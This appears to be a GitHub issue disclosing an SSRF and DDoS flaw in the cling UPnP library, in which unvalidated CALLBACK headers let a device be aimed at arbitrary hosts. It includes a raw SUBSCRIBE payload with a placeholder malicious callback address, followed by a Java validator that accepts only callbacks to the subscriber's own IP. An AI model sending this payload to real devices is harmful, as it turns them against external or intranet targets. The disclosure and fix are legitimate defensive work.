4thline / cling

UPnP/DLNA library for Java and Android

SSRF and DDOS vulnerability

YYHYlh opened this issue · comments

The UPnP protocol implemented in the latest version of cling has a flaw: the CALLBACK parameter in the request header of the service's subscribe request is not checked. As a result, an attacker can use this flaw to send malicious data to a device developed using cling, which causes the device to send a large amount of data to an IP address specified by the attacker, implementing a DDoS attack; at the same time, the vulnerability can be used to carry out an SSRF attack on the intranet.
The payload is:

SUBSCRIBE / HTTP/1.1
Host: localhost:9999
Accept-Encoding: identity
User-Agent: Callstranger Vulnerability Checker
CALLBACK: <Malicious address>
TIMEOUT: Second-300
NT: upnp:event
Content-Length: 0
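As an added illustration of the missing check (this is not cling's code; the class name CallbackHeaderValidator and method acceptedCallbacks are assumptions), the validator below parses the CALLBACK header of a SUBSCRIBE request and keeps only callback URLs that use plain http and whose host is an IP literal equal to the address the request came from, so a device never delivers event traffic to a third-party or internal address named by the subscriber.

```java
import java.net.InetAddress;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.UnknownHostException;
import java.util.ArrayList;
import java.util.List;

/** Validates the CALLBACK header of a UPnP SUBSCRIBE request before a device accepts it. */
public final class CallbackHeaderValidator {

    /**
     * Parses a CALLBACK header value ("<url1><url2>...") and returns only the URLs that
     * event NOTIFY messages may be delivered to: plain http, a literal IP host (so no DNS
     * lookup is made), and that IP equal to the address the SUBSCRIBE request came from.
     */
    public static List<URI> acceptedCallbacks(String callbackHeader, InetAddress subscriber) {
        List<URI> accepted = new ArrayList<>();
        if (callbackHeader == null) return accepted;
        int pos = 0, start;
        while ((start = callbackHeader.indexOf('<', pos)) >= 0) {
            int end = callbackHeader.indexOf('>', start);
            if (end < 0) break;                       // unterminated entry: drop the rest
            pos = end + 1;
            URI uri;
            try {
                uri = new URI(callbackHeader.substring(start + 1, end).trim());
            } catch (URISyntaxException e) {
                continue;                             // malformed URL: skip it
            }
            String host = uri.getHost();
            if (!"http".equalsIgnoreCase(uri.getScheme()) || host == null) continue;
            if (hostIsSubscriber(host, subscriber)) accepted.add(uri);
        }
        return accepted;
    }

    /** True only when host is an IP literal identical to the subscriber's source address. */
    private static boolean hostIsSubscriber(String host, InetAddress subscriber) {
        boolean ipv4Literal = host.matches("\\d{1,3}(\\.\\d{1,3}){3}");
        boolean ipv6Literal = host.startsWith("[") && host.endsWith("]");
        if (!ipv4Literal && !ipv6Literal) return false;  // hostnames are refused outright
        try {
            return InetAddress.getByName(host).equals(subscriber);
        } catch (UnknownHostException e) {
            return false;
        }
    }

    public static void main(String[] args) throws UnknownHostException {
        InetAddress src = InetAddress.getByName("192.168.1.20");
        // Constructed header: one callback pointing back at the subscriber, two pointing elsewhere.
        String header = "<http://192.168.1.20:49152/cb><http://203.0.113.7/cb><http://10.0.0.5:8080/admin>";
        System.out.println(acceptedCallbacks(header, src));
    }
}
```

Only the first URL survives the check; the other two, which would turn the device into a traffic source against an external host or an intranet service, are dropped before any subscription is registered.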